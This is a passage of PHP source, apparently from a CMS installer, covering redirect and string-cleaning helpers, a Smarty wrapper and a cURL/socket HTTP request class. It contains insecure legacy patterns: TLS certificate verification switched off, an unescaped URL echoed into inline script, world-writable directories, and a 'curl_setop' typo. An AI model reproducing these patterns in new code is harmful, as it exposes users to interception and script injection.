                        $to .= (\strlen(\dirname($_SERVER['REQUEST_URI'])) > 1 ? \dirname($_SERVER['REQUEST_URI']) . '/' : '/') . $components['path'];
                }
            }
            else {
                $to .= $_SERVER['REQUEST_URI'];
            }
            $to .= isset($components['query']) ? '?' . $components['query'] : '';
            $to .= isset($components['fragment']) ? '#' . $components['fragment'] : '';
        }
        else {
            $to = $schema."://".$host."/".$to;
        }

        \session_write_close();

        if(\headers_sent() ) {

            // use javascript instead
            echo '<script type="text/javascript"><!-- location.replace("'.$to.'"); // --></script><noscript><meta http-equiv="Refresh" content="0;URL='.$to.'"></noscript>';
            exit;
        }
        else {
            \header("Location: $to");
            exit();
        }
    }

    public static function to_bool($in,$strict = FALSE)
    {
        $in = \strtolower((string) $in);
        if( \in_array($in, ['1', 'y', 'yes', 'true', 't', 'on']) ) return TRUE;
        if( \in_array($in, ['0', 'n', 'no', 'false', 'f', 'off']) ) return FALSE;
        if( $strict ) return null;
        return (bool)$in;
    }

    public static function clean_string($val)
    {
        if( !$val ) return $val;
        $val = (string) $val;
        $val = \preg_replace("/\\\$/", '$', $val);
        $val = \preg_replace("/\r/", "", $val);
        $val = \str_replace(['!', "'"], ['!', "'"], $val);
        
        return \strip_tags($val);
    }
  
  /**
   * cleans passwords for config.php mainly db pass.
   * we don't want quotes on the string
   * @since 1.3.13
   * @param $val
   *
   * @return string|string[]
   */
    public static function clean_password($val)
    {
      if( !$val ) return $val;
      $val = \trim((string) $val );
      $val = \str_replace(["'", '"'], '', $val);
  
      return $val;
    }

    public static function get_sys_tmpdir()
    {
        $vars = ['TMP', 'TMPDIR', 'TEMP'];
        foreach( $vars as $var ) {
            if( isset($_ENV[$var]) && $_ENV[$var] ) {
                $tmp = \realpath($_ENV[$var]);
                if( $tmp && @\is_dir($tmp) && @\is_writable($tmp) ) return $tmp;
            }
        }

        $tmpdir = \ini_get('upload_tmp_dir');
        if( $tmpdir && @\is_dir($tmpdir) && @\is_writable($tmpdir) ) return $tmpdir;
        
        
        /**
         * sys_get_temp_dir() is available in PHP >= 5.3, so we can use it.
         * In any case, this should wrap it, no more need for a fallback.
         */
//        if( \function_exists('sys_get_temp_dir') ) {
            $tmp = \rtrim(\sys_get_temp_dir(), '\\/');
            if( $tmp && @\is_dir($tmp) && @\is_writable($tmp) ) return $tmp;
//        }

        /** safe mode was removed in PHP 5.4.0. */
//        if('1' != \ini_get('safe_mode')) {
            // last ditch effort to find a place to write to.
            $tmp = @\tempnam('', 'xxx');
            if($tmp && \file_exists($tmp) ) {
                @\unlink($tmp);
                return \realpath(\dirname($tmp));
            }
//        }
        
        throw new \RuntimeException('Could not find a writable location for temporary files');
    }

    public static function is_email($str)
    {
        return \filter_var($str, \FILTER_VALIDATE_EMAIL);
    }

    /**
     * Check the permissions of a directory recursively to make sure that
     * we have write permission to all files and folders.
     *
     * @param  string  $path Start directory.
     * @param  bool    $ignore_specialfiles  Optionally ignore special system files in the check.  Special files include files beginning with ., and php.ini files.
     * @return bool
     */
    public static function is_directory_writable( $path, $ignore_specialfiles = TRUE )
    {
        if ('/' != \substr ($path , \strlen ($path ) - 1 )) $path .= '/' ;
        
        $p      = '';
        $result = TRUE;
        
        if( $handle = @\opendir($path ) ) {
            while( false !== ( $file = \readdir($handle ) ) ) {
                if( $file == '.' || $file == '..' ) continue;

                // ignore dotfiles, except .htaccess.
                if( $ignore_specialfiles ) {
                    if( $file[0] == '.' && $file != '.htaccess' ) continue;
                    if( $file == 'php.ini' ) continue;
                }

                $p = $path.$file;
                if( !@\is_writable($p ) ) {
                    self::$_writable_error[] = $p;
                    @\closedir($handle );
                    return FALSE;
                }

                if( @\is_dir($p ) ) {
                    $result = self::is_directory_writable( $p, $ignore_specialfiles );
                    if( !$result ) {
                        self::$_writable_error[] = $p;
                        @\closedir($handle );
                        return FALSE;
                    }
                }
            }
            @\closedir($handle );
        }
        else {
            self::$_writable_error[] = $p;
            return FALSE;
        }

        return TRUE;
    }


    public static function get_writable_error()
    {
        return self::$_writable_error;
    }

    public static function rrmdir($dir)
    {
        if (\is_dir($dir)) {
            $objects = \scandir($dir);
            foreach ($objects as $object) {
                if ($object != '.' && $object != '..') {
                    if (\filetype($dir . '/' . $object) == 'dir') self::rrmdir($dir . '/' . $object); else \unlink($dir .
                                                                                                                   '/' . $object);
                }
            }
            \reset($objects);
            \rmdir($dir);
        }
    }

} // end of class
?>
<?php

// compatibility stuff
if( !function_exists('gzopen') && function_exists('gzopen64') ) {
    function gzopen($filename , $mode , $use_include_path = 0) {
        return gzopen64($filename, $mode, $use_include_path);
    }
}

?><?php

namespace __appbase;

function startswith($haystack,$needle) : bool
{
  return (\substr($haystack, 0, \strlen($needle)) == $needle);
}

function endswith($haystack,$needle) : bool
{
  return (\substr($haystack, -1 * \strlen($needle)) == $needle);
}

?>
<?php

namespace __appbase;

use cms_autoinstaller\smarty_phar_resource;

require_once(\dirname(__FILE__, 2) . '/Smarty/Smarty.class.php');

class cms_smarty extends \Smarty
{
  private static $_instance;
  
  /**
   * @throws \SmartyException
   * @throws \Exception
   */
  public function __construct()
  {
    parent::__construct();
    
    $app     = get_app(); # may not be needed
    $rootdir = app::get_rootdir();
    $tmpdir  = app::get_tmpdir() . '/m' . \md5(__FILE__);
    $appdir  = app::get_appdir();
    $basedir = \dirname(__FILE__, 3);
    
    $this->setTemplateDir($appdir.'/templates');
    $this->setConfigDir($appdir.'/configs');
    $this->setCompileDir($tmpdir.'/templates_c');
    $this->setCacheDir($tmpdir.'/cache');

    $this->registerPlugin('modifier', 'tr', [$this, 'modifier_tr']);
    
    # for debugging purposes
    # $this->registerResource('phar', new smarty_phar_resource());
    $dirs = [$this->compile_dir, $this->cache_dir];
    
    foreach($dirs as $iValue)
    {
      
      if(!@\mkdir($concurrentDirectory = $iValue, 0777, TRUE) && !\is_dir($concurrentDirectory))
      {
        throw new \RuntimeException(\sprintf('Directory "%s" was not created', $concurrentDirectory));
      }
      if( !\is_dir($iValue) )
      {
        throw new \RuntimeException('Required directory ' . $iValue . ' does not exist');
      }
    }
  }

  public static function get_instance()
  {
    if( !\is_object(self::$_instance) ) self::$_instance = new cms_smarty;
    return self::$_instance;
  }

  public function modifier_tr()
  {
    $args = \func_get_args();
    return langtools::get_instance()->translate($args);
  }
}

?><?php

namespace __appbase;

function &get_db()
{
  require_once(dirname(__DIR__).'/adodb_lite/adodb.inc.php');
  
}

?><?php

namespace __appbase;

/**
 * @package CMS
 */

/**
 * HTTP Class
 *
 * This is a wrapper HTTP class that uses either cURL or fsockopen to
 * harvest resources from web. This can be used with scripts that need
 * a way to communicate with various APIs who support REST.
 *
 * @author      Md Emran Hasan <phpfour@gmail.com>
 * @package     HTTP Library
 * @copyright   2007-2008 Md Emran Hasan
 * @link        http://www.phpfour.com/lib/http
 * @since       Version 0.1
 *
 * Modified by Robert Campbell (calguy1000@cmsmadesimple.org)
 * Renamed the class to cms_http_request
 * Fixed some bugs.
 */

class http_request
{
    /**
     * Contains the target URL
     *
     * @var string
     */
    private $target;

    /**
     * socket
     *
     */
    private $_socket;

    /**
     * Contains the target host
     *
     * @var string
     */
    private $host;

    /**
     * Contains the target port
     *
     * @var integer
     */
    private $port;

    /**
     * Contains the target path
     *
     * @var string
     */
    private $path;

    /**
     * Contains the target schema
     *
     * @var string
     */
    private $schema;

    /**
     * Contains the http method (GET or POST)
     *
     * @var string
     */
    private $method;

    /**
     * Contains raw post data
     *
     * @var str
     */
    private $rawPostData;

    /**
     * Contains the parameters for request
     *
     * @var array
     */
    private $params;

    /**
     * Contains the cookies for request
     *
     * @var array
     */
    private $cookies;

    /**
     * Contains the cookies retrieved from response
     *
     * @var array
     */
    private $_cookies;

    /**
     * Number of seconds to timeout
     *
     * @var integer
     */
    private $timeout;

    /**
     * Whether to use cURL or not
     *
     * @var boolean
     */
    private $useCurl;

    /**
     * Contains the referrer URL
     *
     * @var string
     */
    private $referrer;

    /**
     * Contains the User agent string
     *
     * @var string
     */
    private $userAgent;

    /**
     * Contains the cookie path (to be used with cURL)
     *
     * @var string
     */
    private $cookiePath;

    /**
     * Whether to use cookie at all
     *
     * @var boolean
     */
    private $useCookie;

    /**
     * Whether to store cookie for subsequent requests
     *
     * @var boolean
     */
    private $saveCookie;

    /**
     * Contains the Username (for authentication)
     *
     * @var string
     */
    private $username;

    /**
     * Contains the Password (for authentication)
     *
     * @var string
     */
    private $password;

    /**
     * Contains the fetched web source
     *
     * @var string
     */
    private $result;

    /**
     * Contains the last headers
     *
     * @var string
     */
    private $headers;

    /**
     * Contains the last call's http status code
     *
     * @var string
     */
    private $status;

    /**
     * Whether to follow http redirect or not
     *
     * @var boolean
     */
    private $redirect;

    /**
     * The maximum number of redirect to follow
     *
     * @var integer
     */
    private $maxRedirect;

    /**
     * The current number of redirects
     *
     * @var integer
     */
    private $curRedirect;

    /**
     * Contains any error occurred
     *
     * @var string
     */
    private $error;

    /**
     * Store the next token
     *
     * @var string
     */
    private $nextToken;

    /**
     * Whether to keep debug messages
     *
     * @var boolean
     */
    private $debug;

    /**
     * Stores optional http headers
     *
     * @var array
     */
    private $headerArray;

    /**
     * Stores the debug messages
     *
     * @var array
     * @todo will keep debug messages
     */
    private $debugMsg;

    /**
     * Stores proxy information (host:port)
     *
     * @var string
     */
    private $proxy;

    /**
     * Constructor for initializing the class with default values.
     *
     * @return void
     */
    public function __construct()
    {
        $this->clear();
    }

    /**
     * Initialize preferences
     *
     * This function will take an associative array of config values and
     * will initialize the class variables using them.
     *
     * Example use:
     *
     * <pre>
     * $httpConfig['method']     = 'GET';
     * $httpConfig['target']     = 'http://www.somedomain.com/index.html';
     * $httpConfig['referrer']   = 'http://www.somedomain.com';
     * $httpConfig['user_agent'] = 'My Crawler';
     * $httpConfig['timeout']    = '30';
     * $httpConfig['params']     = array('var1' => 'testvalue', 'var2' => 'somevalue');
     *
     * $http = new Http();
     * $http->initialize($httpConfig);
     * </pre>
     *
     * @param array Config values as associative array
     * @return void
     */
    function initialize($config = array())
    {
        $this->clear();
        foreach ($config as $key => $val)
        {
            if (isset($this->$key))
            {
                $method = 'set' . ucfirst(str_replace('_', '', $key));

                if (method_exists($this, $method))
                {
                    $this->$method($val);
                }
                else
                {
                    $this->$key = $val;
                }
            }
        }
    }

    /**
     * Clear Everything
     *
     * Clears all the properties of the class and sets the object to
     * the beginning state. Very handy if you are doing subsequent calls
     * with different data.
     *
     * @return void
     */
    function clear()
    {
        // Set the request defaults
        $this->host         = '';
        $this->port         = 0;
        $this->path         = '';
        $this->target       = '';
        $this->method       = 'GET';
        $this->schema       = 'http';
        $this->params       = array();
        $this->headers      = array();
        $this->cookies      = array();
        $this->_cookies     = array();
        $this->headerArray  = array();
        $this->proxy        = null;

        // Set the config details
        $this->debug        = FALSE;
        $this->error        = '';
        $this->status       = 0;
        $this->timeout      = '25';
        $this->useCurl      = TRUE;
        $this->referrer     = '';
        $this->username     = '';
        $this->password     = '';
        $this->redirect     = FALSE;
        $this->result       = null;

        // Set the cookie and agent defaults
        $app = get_app();
        $this->nextToken    = '';
        $this->useCookie    = TRUE;
        $this->saveCookie   = TRUE;
        $this->maxRedirect  = 3;
        $this->cookiePath   = $app->get_tmpdir().'/c' . \md5(__CLASS__ . \session_id()) . '.dat'; // by default, use a cookie file that is unique only to this session.
        $this->userAgent    = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.9';
    }

    /**
     * Clear all cookies
     *
     * @return void
     * @author Robert Campbell (calguy1000@gmail.com)
     */
    function resetCookies()
    {
      if( $this->cookiePath ) @unlink($this->cookiePath);
    }

    /**
     * Set target URL
     *
     * @param string URL of target resource
     * @return void
     */
    function setTarget($url)
    {
        if ($url)
        {
            $this->target = $url;
        }
    }

    /**
     * Set http method
     *
     * @param string HTTP method to use (GET or POST)
     * @return void
     */
    function setMethod($method)
    {
        if ($method == 'GET' || $method == 'POST')
        {
            $this->method = $method;
        }
    }

    /**
     * Set referrer URL
     *
     * @param string URL of referrer page
     * @return void
     */
    function setReferrer($referrer)
    {
        if ($referrer)
        {
            $this->referrer = $referrer;
        }
    }

    /**
     * Set User agent string
     *
     * @param string Full user agent string
     * @return void
     */
    function setUseragent($agent)
    {
        if ($agent)
        {
            $this->userAgent = $agent;
        }
    }

    /**
     * Set timeout of execution
     *
     * @param integer Timeout delay in seconds
     * @return void
     */
    function setTimeout($seconds)
    {
        if ($seconds > 0)
        {
            $this->timeout = $seconds;
        }
    }

    /**
     * Set cookie path (cURL only)
     *
     * @param string File location of cookiejar
     * @return void
     */
    function setCookiepath($path)
    {
        if ($path)
        {
            $this->cookiePath = $path;
        }
    }

    function setRawPostData($data)
    {
      $this->rawPostData = $data;
    }

    /**
     * Set request parameters
     *
     * @param array All the parameters for GET or POST
     * @return void
     */
    function setParams($dataArray)
    {
      if( !is_array($dataArray) )
	{
	  $this->setRawPostData($dataArray);
	}
      else if (is_array($dataArray))
        {
	  $this->params = array_merge($this->params, $dataArray);
        }
    }

    /**
     * Set basic http authentication realm
     *
     * @param string Username for authentication
     * @param string Password for authentication
     * @return void
     */
    function setAuth($username, $password)
    {
        if (!empty($username) && !empty($password))
        {
            $this->username = $username;
            $this->password = $password;
        }
    }

    /**
     * Set maximum number of redirection to follow
     *
     * @param integer Maximum number of redirects
     * @return void
     */
    function setMaxredirect($value)
    {
        if (!empty($value))
        {
            $this->maxRedirect = $value;
        }
    }

    /**
     * Add request parameters
     *
     * @param string Name of the parameter
     * @param string Value of the parameter
     * @return void
     */
    function addParam($name, $value)
    {
        if (!empty($name) && $value !== '')
        {
            $this->params[$name] = $value;
        }
    }

    /**
     * Add a cookie to the request
     *
     * @param string Name of cookie
     * @param string Value of cookie
     * @return void
     */
    function addCookie($name, $value)
    {
        if (!empty($name) && !empty($value))
        {
            $this->cookies[$name] = $value;
        }
    }

    /**
     * Whether to use cURL or not
     *
     * @param boolean Whether to use cURL or not
     * @return void
     */
    function useCurl($value = TRUE)
    {
        if (is_bool($value))
        {
            $this->useCurl = $value;
        }
    }

    /**
     * Whether to use cookies or not
     *
     * @param boolean Whether to use cookies or not
     * @return void
     */
    function useCookie($value = TRUE)
    {
        if (is_bool($value))
        {
            $this->useCookie = $value;
        }
    }

    /**
     * Whether to save persistent cookies in subsequent calls
     *
     * @param boolean Whether to save persistent cookies or not
     * @return void
     */
    function saveCookie($value = TRUE)
    {
        if (is_bool($value))
        {
            $this->saveCookie = $value;
        }
    }

    /**
     * Whether to follow HTTP redirects
     *
     * @param boolean Whether to follow HTTP redirects or not
     * @return void
     */
    function followRedirects($value = TRUE)
    {
        if (is_bool($value))
        {
            $this->redirect = $value;
        }
    }

    /**
     * Get execution result body
     *
     * @return string output of execution
     */
    function getResult()
    {
        return $this->result;
    }

    /**
     * Get execution result headers
     *
     * @return array last headers of execution
     */
    function getHeaders()
    {
        return $this->headers;
    }

    /**
     * Get execution status code
     *
     * @return integer last http status code
     */
    function getStatus()
    {
        return $this->status;
    }

    /**
     * Get last execution error
     *
     * @return string last error message (if any)
     */
    function getError()
    {
        return $this->error;
    }

    /**
     * Request Header Exists?
     */
    function requestHeaderExists($key)
    {
      if( !is_array($this->headerArray) )
	{
	  $this->headerArray = array();
	}
      if( strpos($key,':') !== FALSE )
	{
	  $tmp = explode(':',$key);
	  $key = trim($tmp[0]);
	}
      for($i = 0, $iMax = count($this->headerArray); $i < $iMax; $i++ )
	{
	  $tmp = explode(':',$this->headerArray[$i],1);
	  $key2 = trim($tmp[0]);
	  if( $key2 == $key ) return TRUE;
	}
      return FALSE;
    }

    /**
     * Add a request header
     *
     */
    function addRequestHeader($str,$prepend = false)
    {
      if( !is_array($this->headerArray) )
	{
	  $this->headerArray = array();
	}

      $f = 0;
      if( strpos($str,':') !== FALSE )
	{
	  $tmp = explode(':',$str,1);
	  $key = trim($tmp[0]);
	  for($i = 0, $iMax = count($this->headerArray); $i < $iMax; $i++ )
	    {
	      $tmp = explode(':',$this->headerArray[$i],1);
	      $key2 = trim($tmp[0]);
	      if( $key2 == $key )
		{
		  // found a duplicate.
		  $this->headerArray[$i] = $str;
		  $f = 1;
		  break;
		}
	    }
	}
      if( !$f )
	{
	  if( $prepend )
	    {
	      array_unshift($this->headerArray,$str);
	    }
	  else
	    {
	      $this->headerArray[] = $str;
	    }
	}
    }


    private function _isCurlSuitable()
    {
      static $_curlgood = -1;

      if( $_curlgood == -1 )
	{
	  $_curlgood = 0;
	  if( in_array('curl',get_loaded_extensions()) )
	    {
	      if( function_exists('curl_version') )
		{
		  $tmp = curl_version();
		  if( isset($tmp['version']) )
		    {
		      if( version_compare($tmp['version'],'7.19.7') >= 0 )
			{
			  $_curlgood = 1;
			}
		    }
		}
	    }
	}

      return $_curlgood;
    }

    /**
     * Execute a HTTP request
     *
     * Executes the http fetch using all the set properties. Intellegently
     * switch to fsockopen if cURL is not present. And be smart to follow
     * redirects (if asked so).
     *
     * @param string URL of the target page (optional)
     * @param string URL of the referrer page (optional)
     * @param string The http method (GET or POST) (optional)
     * @param array Parameter array for GET or POST (optional)
     * @return string Response body of the target page
     */
    public function execute($target = '', $referrer = '', $method = '', $data = array())
    {
        // Populate the properties
        $this->target = ($target) ? $target : $this->target;
        $this->method = ($method) ? $method : $this->method;

        $this->referrer = ($referrer) ? $referrer : $this->referrer;

        // Add the new params
        if (is_array($data) && count($data) > 0)
        {
            $this->params = array_merge($this->params, $data);
        }

        // Process data, if presented
	$queryString = '';
	if($this->rawPostData)
	{
	  $queryString = $this->rawPostData;
	}
        else if(is_array($this->params) && count($this->params) > 0)
        {
	    $queryString = http_build_query($this->params,'','&');
        }

        // If cURL is not installed, we'll force fscokopen
	$this->useCurl = $this->useCurl && $this->_isCurlSuitable();

        // GET method configuration
        if($this->method == 'GET')
        {
            if($queryString)
            {
                $this->target = $this->target . "?" . $queryString;
            }
        }

        // Parse target URL
        $urlParsed = parse_url($this->target);
	if( $this->port == 0 && isset($urlParsed['port']) && $urlParsed['port'] > 0 )
	  {
	    $this->port = $urlParsed['port'];
	  }

        // Handle SSL connection request
        if ($urlParsed['scheme'] == 'https')
        {
            $this->host = $urlParsed['host'];
            $this->port = ($this->port != 0) ? $this->port : 443;
	    $this->_socket = 'ssl://'.$urlParsed['host'].':'.$this->port;
        }
        else
        {
            $this->host = $urlParsed['host'];
            $this->port = ($this->port != 0) ? $this->port : 80;
	    $this->_socket = 'tcp://'.$urlParsed['host'].':'.$this->port;
        }

        // Finalize the target path
        $this->path   = (isset($urlParsed['path']) ? $urlParsed['path'] : '/') . (isset($urlParsed['query']) ? '?' . $urlParsed['query'] : '');
        $this->schema = $urlParsed['scheme'];

        // Pass the requred cookies
        $this->_passCookies();

        // Process cookies, if requested
	$cookieString = '';
        if(is_array($this->cookies) && count($this->cookies) > 0)
        {
            // Get a blank slate
            $tempString   = array();

            // Convert cookiesa array into a query string (ie animal=dog&sport=baseball)
            foreach ($this->cookies as $key => $value)
            {
                if(strlen(trim($value)) > 0)
                {
                    $tempString[] = $key . "=" . urlencode($value);
                }
            }

            $cookieString = join('&', $tempString);
        }

        // Do we need to use cURL
        if ($this->useCurl)
        {
            // Initialize PHP cURL handle
            $ch = curl_init();

            // GET method configuration
            if($this->method == 'GET')
            {
                curl_setopt ($ch, CURLOPT_HTTPGET, TRUE);
                curl_setopt ($ch, CURLOPT_POST, FALSE);
            }
            // POST method configuration
            else
            {
                curl_setopt ($ch, CURLOPT_POST, TRUE);
                curl_setopt ($ch, CURLOPT_HTTPGET, FALSE);

                if(isset($queryString))
                {
                    curl_setopt ($ch, CURLOPT_POSTFIELDS, $queryString);
                }
            }

            // Basic Authentication configuration
            if ($this->username && $this->password)
            {
                curl_setopt($ch, CURLOPT_USERPWD, $this->username . ':' . $this->password);
            }

	    if ($this->proxy)
	    {
	        curl_setop($ch,CURLOPT_PROXY,$this->proxy);
	    }

            // Custom cookie configuration
            if($this->useCookie)
            {
	      // we are sending cookies.
	      if(isset($cookieString))
		{
		  curl_setopt ($ch, CURLOPT_COOKIE, $cookieString);
		}
	      else
		{
		  curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookiePath);
		}
            }
            if($this->saveCookie)
	    {
	      curl_setopt($ch, CURLOPT_COOKIEJAR,      $this->cookiePath);    // Save cookies here.
	    }

	    curl_setopt($ch, CURLOPT_HEADER,     TRUE);                 // No need of headers
	    if( is_array($this->headerArray) )
	      {
		curl_setopt($ch,CURLOPT_HTTPHEADER,$this->headerArray);
	      }
	    else
	      {
		curl_setopt($ch, CURLOPT_HEADER,     TRUE);                 // No need of headers
	      }
	    curl_setopt($ch, CURLOPT_NOBODY,         FALSE);                // Return body
            curl_setopt($ch, CURLOPT_TIMEOUT,        $this->timeout);       // Timeout
            curl_setopt($ch, CURLOPT_USERAGENT,      $this->userAgent);     // Webbot name
            curl_setopt($ch, CURLOPT_URL,            $this->target);        // Target site
            curl_setopt($ch, CURLOPT_REFERER,        $this->referrer);      // Referer value

            curl_setopt($ch, CURLOPT_VERBOSE,        FALSE);                // Minimize logs
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);                // No certificate
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, $this->redirect);      // Follow redirects
            curl_setopt($ch, CURLOPT_MAXREDIRS,      $this->maxRedirect);   // Limit redirections to four
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);                 // Return in string

            // Get the target contents
            $content = curl_exec($ch);
	    if( !empty($content) )
	      {
		$tmp = explode("\r\n\r\n", $content,2);
		for($i = 0, $iMax = count($tmp); $i < $iMax; $i++ )
		  {
		    if( empty($tmp[$i]) ) unset($tmp[$i]);
		  }

		if( count($tmp) > 1 )
		  {
		    // Store the contents
		    $this->result = $tmp[1];
		  }

		// Parse the headers
		$this->_parseHeaders($tmp[0]);
	      }

            // Get the request info
            $status  = curl_getinfo($ch);

            // Store the error (is any)
            $this->_setError(curl_error($ch));

            // Close PHP cURL handle
            curl_close($ch);
        }
        else
        {
	  // Get a file pointer
	  $filePointer = @stream_socket_client($this->_socket, $errorNumber, $errorString, $this->timeout);

	  // We have an error if pointer is not there
	  if (!$filePointer)
            {
	      $this->_setError('Failed opening http socket connection: ' . $errorString . ' (' . $errorNumber . ')');
	      return FALSE;
            }

            // Set http headers with host, user-agent and content type
            $this->addRequestHeader($this->method .' '. $this->path. "  HTTP/1.1",true);
	    $this->addRequestHeader("Host: " . $this->host);
	    $this->addRequestHeader('Accept: */*');
 	    $this->addRequestHeader("User-Agent: " . $this->userAgent);
	    if( !$this->requestHeaderExists('Content-Type') )
	      {
		$this->addRequestHeader("Content-Type: application/x-www-form-urlencoded");
	      }

            // Specify the custom cookies
            if ($this->useCookie && $cookieString != '')
            {
	      $this->addRequestHeader("Cookie: " . $cookieString);
            }

            // POST method configuration
            if ($this->method == "POST")
            {
              $this->addRequestHeader("Content-Length: " . strlen($queryString));
            }

            // Specify the referrer
	    $this->addRequestHeader("Referer: " . $this->referrer);
            if ($this->referrer != '')
            {
	      $this->addRequestHeader("Referer: " . $this->referrer);
            }

            // Specify http authentication (basic)
            if ($this->username && $this->password)
            {
	      $this->addRequestheader("Authorization: Basic " . base64_encode($this->username . ':' . $this->password));
            }

	    $this->addRequestHeader("Connection: close");

            // POST method configuration
	    $requestHeader = implode("\r\n",$this->headerArray)."\r\n\r\n";
            if ($this->method == "POST")
            {
                $requestHeader .= $queryString;
            }

            // We're ready to launch
            fwrite($filePointer, $requestHeader);


            // Clean the slate
            $responseHeader = '';
            $responseContent = '';

            // 3...2...1...Launch !
	    $n = 0;
            do
            {
                $responseHeader .= fread($filePointer, 1);
            }
            while (!preg_match('/\\r\\n\\r\\n$/', $responseHeader) && !feof($filePointer));

            // Parse the headers
            $this->_parseHeaders($responseHeader);

            // Do we have a 301/302 redirect ?
            if (($this->status == '301' || $this->status == '302') && $this->redirect == TRUE)
            {
                if ($this->curRedirect < $this->maxRedirect)
                {
                    // Let's find out the new redirect URL
                    $newUrlParsed = parse_url($this->headers['location']);

                    if ($newUrlParsed['host'])
                    {
                        $newTarget = $this->headers['location'];
                    }
                    else
                    {
                        $newTarget = $this->schema . '://' . $this->host . '/' . $this->headers['location'];
                    }

                    // Reset some of the properties
                    $this->port   = 0;
                    $this->status = 0;
                    $this->params = array();
                    $this->method = 'POST';
                    $this->referrer = $this->target;

                    // Increase the redirect counter
                    $this->curRedirect++;

                    // Let's go, go, go !
                    $this->result = $this->execute($newTarget);
                }
                else
                {
                    $this->_setError('Too many redirects.');
                    return FALSE;
                }
            }
            else
            {
                // Nope...so lets get the rest of the contents (non-chunked)
	      if (!isset($this->headers['transfer-encoding']) || $this->headers['transfer-encoding'] != 'chunked')
                {
                    while (!feof($filePointer))
                    {
                        $responseContent .= fgets($filePointer, 128);
                    }
                }
                else
		  {
                    // Get the contents (chunked)
		    while (!feof($filePointer) && $chunkLength = hexdec(fgets($filePointer)))
                    {
                        $responseContentChunk = '';
                        $readLength = 0;

                        while ($readLength < $chunkLength)
                        {
                            $responseContentChunk .= fread($filePointer, $chunkLength - $readLength);
                            $readLength = strlen($responseContentChunk);
                        }

                        $responseContent .= $responseContentChunk;
                        fgets($filePointer);
                    }
                }

                // Store the target contents
                $this->result = chop($responseContent);
            }
        }

        // There it is! We have it!! Return to base !!!
        return $this->result;
    }

    /**
     * Parse Headers (internal)
     *
     * Parse the response headers and store them for finding the resposne
     * status, redirection location, cookies, etc.
     *
     * @param string Raw header response
     * @return void
     * @access private
     */
    function _parseHeaders($responseHeader)
    {
        // Break up the headers
        $headers = explode("\r\n", $responseHeader);

        // Clear the header array
        $this->_clearHeaders();

        // Get resposne status
        if($this->status == 0)
        {
            // Oooops !
            if(!preg_match("/http\/[0-9]+\.[0-9]+[ \t]+([0-9]+)[ \t]*(.*)\$/i", $headers[0], $matches))
            {
                $this->_setError('Unexpected HTTP response status');
                return FALSE;
            }

            // Gotcha!
            $this->status = $matches[1];
            array_shift($headers);
        }

        // Prepare all the other headers
        foreach ($headers as $header)
        {
            // Get name and value
            $headerName  = strtolower($this->_tokenize($header, ':'));
            $headerValue = trim(chop($this->_tokenize("\r\n")));

            // If its already there, then add as an array. Otherwise, just keep there
            if(isset($this->headers[$headerName]))
            {
                if(gettype($this->headers[$headerName]) == "string")
                {
                    $this->headers[$headerName] = array($this->headers[$headerName]);
                }

                $this->headers[$headerName][] = $headerValue;
            }
            else
            {
                $this->headers[$headerName] = $headerValue;
            }
        }

        // Save cookies if asked
        if ($this->saveCookie && isset($this->headers['set-cookie']))
        {
            $this->_parseCookie();
        }
    }

    /**
     * Clear the headers array (internal)
     *
     * @return void
     * @access private
     */
    function _clearHeaders()
    {
        $this->headers = array();
    }

    /**
     * Parse Cookies (internal)
     *
     * Parse the set-cookie headers from response and add them for inclusion.
     *
     * @return void
     * @access private
     */
    function _parseCookie()
    {
        // Get the cookie header as array
        if(gettype($this->headers['set-cookie']) == "array")
        {
            $cookieHeaders = $this->headers['set-cookie'];
        }
        else
        {
            $cookieHeaders = array($this->headers['set-cookie']);
        }

        // Loop through the cookies
        for ($cookie = 0, $cookieMax = count($cookieHeaders); $cookie < $cookieMax; $cookie++)
        {
            $cookieName  = trim($this->_tokenize($cookieHeaders[$cookie], "="));
            $cookieValue = $this->_tokenize(";");

            $urlParsed   = parse_url($this->target);

            $domain      = $urlParsed['host'];
            $secure      = '0';

            $path        = "/";
            $expires     = "";

            while(($name = trim(urldecode($this->_tokenize("=")))) != "")
            {
                $value = urldecode($this->_tokenize(";"));

                switch($name)
                {
                    case "path"     : $path     = $value; break;
                    case "domain"   : $domain   = $value; break;
                    case "secure"   : $secure   = ($value != '') ? '1' : '0'; break;
                }
            }

            $this->_setCookie($cookieName, $cookieValue, $expires, $path , $domain, $secure);
        }
    }

    /**
     * Set cookie (internal)
     *
     * Populate the internal _cookies array for future inclusion in
     * subsequent requests. This actually validates and then populates
     * the object properties with a dimensional entry for cookie.
     *
     * @param string Cookie name
     * @param string Cookie value
     * @param string Cookie expire date
     * @param string Cookie path
     * @param string Cookie domain
     * @param string Cookie security (0 = non-secure, 1 = secure)
     * @return void
     * @access private
     */
    function _setCookie($name, $value, $expires = "" , $path = "/" , $domain = "" , $secure = 0)
    {
        if(strlen($name) == 0)
        {
            return($this->_setError("No valid cookie name was specified."));
        }

        if(strlen($path) == 0 || strcmp($path[0], "/"))
        {
            return($this->_setError("$path is not a valid path for setting cookie $name."));
        }

        if($domain == "" || !strpos($domain, ".", $domain[0] == "." ? 1 : 0))
        {
            return($this->_setError("$domain is not a valid domain for setting cookie $name."));
        }

        $domain = strtolower($domain);

        if(!strcmp($domain[0], "."))
        {
            $domain = substr($domain, 1);
        }

        $name  = $this->_encodeCookie($name, true);
        $value = $this->_encodeCookie($value, false);

        $secure = intval($secure);

        $this->_cookies[] = array( "name"      =>  $name,
                                   "value"     =>  $value,
                                   "domain"    =>  $domain,
                                   "path"      =>  $path,
                                   "expires"   =>  $expires,
                                   "secure"    =>  $secure
                                 );
    }

    /**
     * Encode cookie name/value (internal)
     *
     * @param string Value of cookie to encode
     * @param string Name of cookie to encode
     * @return string encoded string
     * @access private
     */
    function _encodeCookie($value, $name)
    {
        return($name ? str_replace("=", "%25", $value) : str_replace(";", "%3B", $value));
    }

    /**
     * Pass Cookies (internal)
     *
     * Get the cookies which are valid for the current request. Checks
     * domain and path to decide the return.
     *
     * @return void
     * @access private
     */
    function _passCookies()
    {
        if (is_array($this->_cookies) && count($this->_cookies) > 0)
        {
            $urlParsed = parse_url($this->target);
            $tempCookies = array();

            foreach($this->_cookies as $cookie)
            {
                if ($this->_domainMatch($urlParsed['host'], $cookie['domain']) && (0 === strpos($urlParsed['path'], $cookie['path']))
